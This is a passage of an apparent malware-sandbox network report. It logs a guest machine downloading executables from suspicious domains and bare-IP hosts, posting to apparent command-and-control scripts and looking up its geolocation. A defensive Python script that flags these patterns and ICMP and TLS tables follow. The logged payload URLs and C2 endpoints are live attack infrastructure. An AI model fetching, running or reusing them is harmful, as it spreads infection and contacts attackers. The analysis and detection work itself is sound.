Connection: keep-alive
ETag: "64b55bcd-b2e00"
Accept-Ranges: bytes
GET 200 http://zzz.fhauiehgha.com/m/okka25.exe
GET /m/okka25.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: zzz.fhauiehgha.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jul 2023 00:59:04 GMT
Content-Type: application/octet-stream
Content-Length: 732672
Last-Modified: Mon, 17 Jul 2023 15:18:37 GMT
Connection: keep-alive
ETag: "64b55bcd-b2e00"
Accept-Ranges: bytes
GET 200 http://hugersi.com/dl/6523.exe
GET /dl/6523.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: hugersi.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Tue, 18 Jul 2023 00:59:04 GMT
Content-Type: application/octet-stream
Content-Length: 248320
Last-Modified: Tue, 18 Jul 2023 00:30:02 GMT
Connection: keep-alive
ETag: "64b5dd0a-3ca00"
Accept-Ranges: bytes
GET 200 http://176.113.115.84:8080/4.php
GET /4.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 176.113.115.84:8080
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:59:04 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="wk7ocswq.exe"
Transfer-Encoding: chunked
Content-Type: application/octet-stream
POST 200 http://208.67.104.60/api/firegate.php
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 541
Host: 208.67.104.60
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:59:48 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 108
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET 200 http://us.imgjeoigaa.com/sts/imagc.jpg
GET /sts/imagc.jpg HTTP/1.1
User-Agent: HTTPREAD
Host: us.imgjeoigaa.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 18 Jul 2023 00:59:48 GMT
Content-Type: image/jpeg
Content-Length: 1506508
Last-Modified: Wed, 28 Jun 2023 02:36:24 GMT
Connection: keep-alive
ETag: "649b9ca8-16fccc"
Accept-Ranges: bytes
GET 200 http://45.15.156.229/api/tracemap.php
GET /api/tracemap.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.15.156.229
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:59:49 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 15
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST 200 http://208.67.104.60/api/firegate.php
POST /api/firegate.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 208.67.104.60
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 00:59:50 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Content-Length: 108
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET 200 http://aa.imgjeoogbb.com/check/safe
GET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43
Host: aa.imgjeoogbb.com
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Jul 2023 00:59:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
POST 200 http://aa.imgjeoogbb.com/check/?sid=298022&key=b4f42524f642c0e49e544b134b89766b
POST /check/?sid=298022&key=b4f42524f642c0e49e544b134b89766b HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43
Content-Length: 160
Host: aa.imgjeoogbb.com
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 18 Jul 2023 00:59:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
GET 301 http://www.maxmind.com/geoip/v2.1/city/me
GET /geoip/v2.1/city/me HTTP/1.1
Connection: Keep-Alive
Referer: https://www.maxmind.com/en/locate-my-ip-address
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.maxmind.com
HTTP/1.1 301 Moved Permanently
Date: Tue, 18 Jul 2023 00:59:52 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 18 Jul 2023 01:59:52 GMT
Location: https://www.maxmind.com/geoip/v2.1/city/me
Server: cloudflare
CF-RAY: 7e86c8d73c7ac18a-ICN
POST 200 http://77.91.68.3/home/love/index.php
POST /home/love/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.68.3
Content-Length: 90
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 01:00:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
GET 200 http://www.google.com/
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 01:00:19 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-9GG5e9Wa6BzIhDICOmAYDg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Encoding: gzip
Server: gws
Content-Length: 2319
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:19 GMT; path=/; domain=.google.com; Secure
Set-Cookie: AEC=Ad49MVGVnauQ3OdeFYyfI1d566YYYrXyiHxSqidt42_Ax4wh2BRnuTNjag; expires=Sun, 14-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=511=DnGEVvZ3bUXer9iZ7IZuQ350INwDJsJLgeul7IP5zp6a-WjeKmXnZDJ-V9yedykH0u1_sbtULquKgUfj5U3USb7VQNtbydRXadq2SP1bX5FDPNSkHzEy0JlXdpTzv2lUh6B1nYg-q2sWhgbGq_cH2W0BNFJU8Gtjf_yc8o-TUsM; expires=Wed, 17-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; HttpOnly
GET 200 http://www.google.com/
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 01:00:19 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-_bMOt8j6gQmJmUry_CM9fA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Encoding: gzip
Server: gws
Content-Length: 2316
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:19 GMT; path=/; domain=.google.com; Secure
Set-Cookie: AEC=Ad49MVEqvvF6cfBpA6LbXJx_Llq4Ag3uh_ooQeZ95KNVzTMSznjJJhOxrIk; expires=Sun, 14-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=511=IwxQ7gKI7YlfNJ5MiaHwQ56ASiqLa4tNeZVerRoe9P6SJzGAuuUg2zhoMCVuno7dJ19bgRHIWaRNUDJC46dUuvRhhRLCq_jSpJcaSgvBIHn_R6M8w7FR4i9plmFC7HQDF5KxaGVWR-uABB2BZr-3N3pn00LTy_RMuX5aYl1A69c; expires=Wed, 17-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; HttpOnly
GET 200 http://www.google.com/
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 01:00:19 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-3SMFyw7OfqDqr8SgYr3rXw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Encoding: gzip
Server: gws
Content-Length: 2318
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:19 GMT; path=/; domain=.google.com; Secure
Set-Cookie: AEC=Ad49MVEynpwT4w86bESbPDfu2IQqyMuETy8iMH_SKBqe2QyjHPvpJyk2E5c; expires=Sun, 14-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=511=jIbDP_SvBVemBVqwsqDW1-aUj3EifxHI2oVFlfBb1rH0TESya-f93UoeU0lu5-USITFnhxxmCpVfe-FsP8J-9jtAg-yg_ulRi4d1gjzwZ2Xf6MpUQqLHnavmuGLMPEe87gfOdt2WXttn7T7vJDGM-ePW8ak7xwY5I_NmNcDAbq4; expires=Wed, 17-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; HttpOnly
GET 200 http://www.google.com/
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 01:00:19 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-SeLpRyEKjuUH_ykyBseYqA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Encoding: gzip
Server: gws
Content-Length: 2316
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:19 GMT; path=/; domain=.google.com; Secure
Set-Cookie: AEC=Ad49MVFZ8PIvV6DqG9EumlNfd03ITeJZmeQVEpcbldFgmjc139TkyVbZM5Q; expires=Sun, 14-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=511=DhMrm29kCVMeY5Yz5BqGwdcTCEVrWtKrGUwmWm6R3Rdtf0nuHE5Ztag7DhE6JxFeum7dFF2R7w3YCE8MPsxEqd6MRr0-nAF-B_PT_3a4elT77P57gZGHAaqecj7t-qyZs6_vcU1ga8_Q5nZ2kGKD__PwTRT2rGFZY5wSMF_8EsY; expires=Wed, 17-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; HttpOnly
GET 200 http://www.google.com/
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 01:00:19 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-NruYBgBjTulzmbHcFlRhhA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Encoding: gzip
Server: gws
Content-Length: 2317
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:19 GMT; path=/; domain=.google.com; Secure
Set-Cookie: AEC=Ad49MVFO5dL3cvUuB65zIVthldpap2gVsEs1ZloCpzTwUzuaThjuCKTzVQ; expires=Sun, 14-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=511=untc_i20XJHjcEfgx7I3VavT5wyCbuWIZQP5iXphlIq8cWOT0jz2bp0L3k-WEJS_WdyqNXCyH3r3Dk1BLGzx897jb6qXquWIktajRZHCBmgZQbJBVs-B_ImBn20tMrg_36haGCLLpdYVhzBFIGN9XT-c9z3D3GJbhlqNnGL2wAY; expires=Wed, 17-Jan-2024 01:00:19 GMT; path=/; domain=.google.com; HttpOnly
GET 200 http://www.google.com/
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 01:00:20 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-7281NS21KbGtZq96VpWreQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Encoding: gzip
Server: gws
Content-Length: 2322
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:20 GMT; path=/; domain=.google.com; Secure
Set-Cookie: AEC=Ad49MVG66hb8LRkFAP4jR5iKEWVFytrizsJsA66cabYCzJhA3wi4jD2Z5g; expires=Sun, 14-Jan-2024 01:00:20 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=511=i8yKBzvKsWQplpi_-2-zmAwmbpU8_z_7J9wmoBxsTcFBq8Nx4yVkNa_UxH8fwY4FUNTL0wi1mkJa1_XHvFdCWITcTXNbGpIXXif4v_JXlzzLuYnTPGBTiRPZOL5cOjXu4z4XUV1boH3jt4joVuT1BfktjLGa0MN-FV3PXZC9V4A; expires=Wed, 17-Jan-2024 01:00:20 GMT; path=/; domain=.google.com; HttpOnly
GET 200 http://www.google.com/
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
Host: www.google.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 18 Jul 2023 01:00:20 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-J8TIv_nMzNN_CeSta0T9ug' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Content-Encoding: gzip
Server: gws
Content-Length: 2320
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2023-07-18-01; expires=Thu, 17-Aug-2023 01:00:20 GMT; path=/; domain=.google.com; Secure
Set-Cookie: AEC=Ad49MVEnp6ZTn5rYBhOCWRD9Q7PDYc5ihjCuq_6s3fJxTspKYznO12qTstM; expires=Sun, 14-Jan-2024 01:00:20 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=511=UrsMJ_yx-alXK2kTx-DaPSFd6UIbaBXwLJV8M0rX1O43531PiJrDokN4kPulLMzr6rThSX4oQv8SXN-TcfEoNuU7NS4KkRP_mcCF2HKe-m3nSlDt4EidCLKCnDZv9VVkYfNYroVdUzo3sCk0FzXdqGuYLB5WG7_Ajb-IrIs6uek; expires=Wed, 17-Jan-2024 01:00:20 GMT; path=/; domain=.google.com; HttpOnly
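The listing above is raw sandbox output. The Python script below is an added triage example for this page (not part of the sandbox's own tooling): it parses entries in the layout used above, accepting both "METHOD STATUS URL" on one line and the method, status and URL on three consecutive lines with REQUEST/RESPONSE/BODY tab labels, and flags the behaviours visible in this run: executables served from bare-IP hosts, a PHP script answering with an `.exe` attachment, the HEAD-then-GET download pattern, external IP/geolocation lookups against db-ip.com and maxmind.com, non-browser User-Agent strings, and several distinct User-Agents from one guest. SAMPLE is a constructed excerpt of the entries above with headers trimmed and User-Agent strings shortened; the finding labels, the EXE_TYPES and GEO_HOSTS sets and the "more than two User-Agents" threshold are the example's own choices, not anything the report asserts.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Added triage example for this report page, not the sandbox's own code.
# EXE_TYPES, GEO_HOSTS and the finding labels are this example's assumptions.
_ENTRY = re.compile(r"^(GET|POST|HEAD)\s+(\d{3})\s+(https?://\S+)$", re.M)  # one- or three-line form
_REQLINE = re.compile(r"^(GET|POST|HEAD) \S+ HTTP/1\.[01]$")
_RESPLINE = re.compile(r"^HTTP/1\.[01] \d{3}")
_BARE_IP = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
EXE_TYPES = {"application/octet-stream", "application/x-msdos-program",
             "application/x-dosexec"}
GEO_HOSTS = {"db-ip.com", "api.db-ip.com", "www.maxmind.com"}  # seen in the listing above


def parse_entries(text):
    """Split the listing into dicts of method, status, url, req and resp headers
    (header names lower-cased); REQUEST/RESPONSE/BODY tab labels are ignored."""
    entries, matches = [], list(_ENTRY.finditer(text))
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(text)
        cur = {"method": m[1], "status": int(m[2]), "url": m[3], "req": {}, "resp": {}}
        section = "req"
        for line in (l.strip() for l in text[m.end():end].splitlines()):
            if _RESPLINE.match(line):          # "HTTP/1.1 200 OK" starts the response
                section = "resp"
            elif ":" in line and not _REQLINE.match(line):
                name, _, value = line.partition(":")
                cur[section][name.strip().lower()] = value.strip()
        entries.append(cur)
    return entries


# Constructed sample: an excerpt of the listing above with headers trimmed
# and User-Agent strings shortened.
SAMPLE = """\
HEAD 200 http://77.91.124.40/info/photo540.exe
HEAD /info/photo540.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/74.0.3729.169
HTTP/1.1 200 OK
Content-Type: application/octet-stream
GET 200 http://77.91.124.40/info/photo540.exe
GET /info/photo540.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/74.0.3729.169
HTTP/1.1 200 OK
Content-Type: application/octet-stream
GET 200 http://176.113.115.84:8080/4.php
GET /4.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/74.0.3729.169
HTTP/1.1 200 OK
Content-disposition: attachment; filename="wk7ocswq.exe"
Content-Type: application/octet-stream
GET 200 https://db-ip.com/demo/home.php?s=175.208.134.152
GET /demo/home.php?s=175.208.134.152 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/109.0.0.0
HTTP/1.1 200 OK
Content-Type: application/json
GET 200 http://us.imgjeoigaa.com/sts/imagc.jpg
GET /sts/imagc.jpg HTTP/1.1
User-Agent: HTTPREAD
HTTP/1.1 200 OK
Content-Type: image/jpeg
"""


def triage(entries):
    """Return sorted (url, finding) pairs worth an analyst's attention."""
    findings, probed, agents = set(), set(), defaultdict(set)
    for e in entries:
        url, u = e["url"], urlparse(e["url"])
        host, ua = u.hostname or "", e["req"].get("user-agent", "<none>")
        ctype = e["resp"].get("content-type", "").split(";")[0].strip().lower()
        disp = e["resp"].get("content-disposition", "")
        # Executable by MIME type, by file name, or by a script answering with
        # an attachment named *.exe (the /4.php case above).
        if (ctype in EXE_TYPES or u.path.lower().endswith(".exe")
                or re.search(r'\.exe"?$', disp, re.I)):
            findings.add((url, "executable payload served"))
        if _BARE_IP.match(host):
            findings.add((url, "bare IP host"))
        if host in GEO_HOSTS:
            findings.add((url, "external IP / geolocation lookup"))
        if e["method"] == "HEAD":                 # size probe before the download
            probed.add(url)
        elif e["method"] == "GET" and url in probed:
            findings.add((url, "HEAD then GET (staged download)"))
        if not ua.startswith("Mozilla/"):
            findings.add((url, f"non-browser User-Agent {ua!r}"))
        agents[ua].add(host)
    # Several User-Agent strings from one guest: several components doing HTTP.
    if len(agents) > 2:
        findings.add(("*", f"{len(agents)} distinct User-Agent strings"))
    return sorted(findings)


if __name__ == "__main__":
    for url, finding in triage(parse_entries(SAMPLE)):
        print(f"{finding:38} {url}")
```

Run as a script it prints eight findings for the sample: the photo540.exe download is flagged three times (executable, bare-IP host, HEAD then GET), /4.php twice, the db-ip lookup once, the HTTPREAD fetch of imagc.jpg once, and one summary line for the three distinct User-Agents. To run it over the full listing, paste the HTTP section into a file and pass its contents to parse_entries; the parser does not care whether the tab labels are still present.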
ICMP traffic
Source | Destination | ICMP Type (3 = Destination Unreachable) | Data |
---|---|---|---|
175.208.134.152 | 192.168.56.102 | 3 | |
175.208.134.152 | 192.168.56.102 | 3 | |
175.208.134.152 | 192.168.56.102 | 3 | |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49181 87.240.137.164:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.102:49173 104.26.9.59:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65 |
TLSv1 192.168.56.102:49196 104.21.0.171:443 | C=US, O=Let's Encrypt, CN=E1 | CN=camoverde.pw | 0b:eb:e2:e3:13:12:aa:a6:e0:88:7b:07:c6:0f:e5:6a:59:08:cf:18 |
TLSv1 192.168.56.102:49214 87.240.137.164:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.102:49228 87.240.137.164:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.102:49230 87.240.137.164:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.102:49220 95.142.206.2:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
TLSv1 192.168.56.102:49218 87.240.137.164:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.102:49239 87.240.137.164:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.102:49242 87.240.137.164:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLSv1 192.168.56.102:49243 95.142.206.0:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.userapi.com | bc:a9:84:5f:86:90:b1:02:ba:2d:66:e8:e5:46:c1:57:e9:c0:cc:24 |
TLSv1 192.168.56.102:49244 95.142.206.2:443 | None | None | None |
TLSv1 192.168.56.102:49254 172.67.75.166:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5 |
TLSv1 192.168.56.102:49257 172.67.75.166:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5 |
